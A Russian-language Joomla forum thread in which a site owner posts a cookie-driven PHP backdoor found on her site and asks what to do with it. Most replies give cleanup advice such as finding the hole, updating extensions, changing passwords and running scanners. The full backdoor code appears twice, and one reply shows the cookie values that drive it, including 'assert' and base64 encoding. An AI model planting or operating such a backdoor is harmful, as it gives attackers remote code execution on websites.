Форум русской поддержки Joomla!® CMS
11.12.2016, 02:27:19 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

нашла вирусы, что с ними делать?

 (Прочитано 594 раз)
0 Пользователей и 1 Гость смотрят эту тему.
katerrinka
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 7


« : 07.02.2016, 19:06:28 »

2 файла:

administrator/components/weklz.php


<?php
class PluginJoomla {
 public function __construct() {
  $jq = @$_COOKIE['41bjGEDj3'];
  if ($jq) {
   $option = $jq(@$_COOKIE['41bjGEDj2']);
   $au=$jq(@$_COOKIE['41bjGEDj1']);
   $option("/438/e",$au,438);
  } else {
   phpinfo();die;
  }
 }
}
$content = new PluginJoomla;

Что можно с ними сделать? удалить? закомментировать?
Записан
dmitry_stas
Профи
********

Репутация: +798/-4
Offline Offline

Сообщений: 7786



« Ответ #1 : 07.02.2016, 19:14:16 »

делайте что угодно, главное поймите, что это не решит вашу проблему. вам надо найти и устранить дыру через которую они к вам попали.
Записан
katerrinka
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 7


« Ответ #2 : 07.02.2016, 19:25:24 »

Вот второй файл насколько я поняла из статьи на хабре и есть шелл:

Показать текстовый блок
« Последнее редактирование: 07.02.2016, 22:52:00 от flyingspook » Записан
katerrinka
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 7


« Ответ #3 : 07.02.2016, 19:33:07 »

Дальше планирую удалить всякие модули типо обратной связи. Закрыть доступ в админку и доступ по ftp.
Записан
dmitry_stas
Профи
********

Репутация: +798/-4
Offline Offline

Сообщений: 7786



« Ответ #4 : 07.02.2016, 19:55:46 »

Дальше планирую удалить всякие модули типо обратной связи.
почему именно их?
Записан
vipiusss
Профи
********

Репутация: +261/-8
Offline Offline

Пол: Мужской
Сообщений: 4573


Skype: renor_


« Ответ #5 : 07.02.2016, 20:03:04 »

почему именно их?
Видно что под горячую руку попалось или под женскую логику Azn

///

Катеринка:вам стоило бы, как вам указали выше, понять, откуда это и возможно в шаблоне/расширении изначально было, а не заразили вас!

И может и дырка в коде или иная уязвимость.
А вы сразу, как хирурги-лижбы резать.
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3540


« Ответ #6 : 07.02.2016, 22:53:02 »

Вам чистить и обновлять сайт с расширениями надо.
Записан
voland
Профи
********

Репутация: +488/-86
Offline Offline

Пол: Мужской
Сообщений: 8736


любит наш народ всякое гавно...


« Ответ #7 : 07.02.2016, 22:55:43 »

Можно их на 5 минут в микроволновку и потом соусом чили полить - будет вкусно.
Записан
ChaosHead
Профи
********

Репутация: +382/-10
Offline Offline

Пол: Мужской
Сообщений: 4398



« Ответ #8 : 08.02.2016, 01:01:39 »

Вирусы - это программы, которые сами распространяются, а у вас тут просто кто-то ходит через заднюю дверь и "хозяйничает" с вашим сайтом.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #9 : 08.02.2016, 10:52:30 »

2 файла:

administrator/components/weklz.php


<?php
class PluginJoomla {
 public function __construct() {
  $jq = @$_COOKIE['41bjGEDj3'];
  if ($jq) {
   $option = $jq(@$_COOKIE['41bjGEDj2']);
   $au=$jq(@$_COOKIE['41bjGEDj1']);
   $option("/438/e",$au,438);
  } else {
   phpinfo();die;
  }
 }
}
$content = new PluginJoomla;

Что можно с ними сделать? удалить? закомментировать?

в куках примерно так:
Цитировать
41bjGEDj3=assert; 41bjGEDj1=echo "ТУТ БЫЛ ВАСЯ";
для болие коректного кода в базе 64 засунте))
Записан
dmitry_stas
Профи
********

Репутация: +798/-4
Offline Offline

Сообщений: 7786



« Ответ #10 : 08.02.2016, 12:11:19 »

в куках примерно так:

мне почему то кажется что на вопрос

Что можно с ними сделать?

ожидался другой ответ  Grin
Записан
CCTRRoman
Осваиваюсь на форуме
***

Репутация: +3/-0
Offline Offline

Сообщений: 91


« Ответ #11 : 08.02.2016, 13:30:54 »

Попробуйте
1. https://www.revisium.com/ai/
или
2. https://www.reg.ru/support/hosting-i-servery/servery-vps/reshenie-problem-raboty-vps/kak-proverit-server-na-nalichie-virusov
или
3. https://www.rsjoomla.com/joomla-extensions/joomla-security.html

ну а затем, после удаления всего лишнего, поменять все пароли на всё,
обновить всё на сайте до последних версий
и не пользоваться варезными расширениями :-)
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #12 : 08.02.2016, 21:11:08 »

или
3. https://www.rsjoomla.com/joomla-extensions/joomla-security.html

ну а затем, после удаления всего лишнего, поменять все пароли на всё,
обновить всё на сайте до последних версий
и не пользоваться варезными расширениями :-)
Крайне не рекомендую этот сервис
Записан
Lentochka
Осваиваюсь на форуме
***

Репутация: +7/-0
Offline Offline

Пол: Женский
Сообщений: 43



« Ответ #13 : 09.02.2016, 10:44:22 »

Крайне не рекомендую этот сервис
А что с ним не так?
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #14 : 09.02.2016, 14:13:33 »

А что с ним не так?
Если вы что то понимаете в природе уязвимостей, и имеете четкое представление к чему это ведет, то вот пост https://forum.antichat.ru/threads/50600/page-16#post-3923889
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet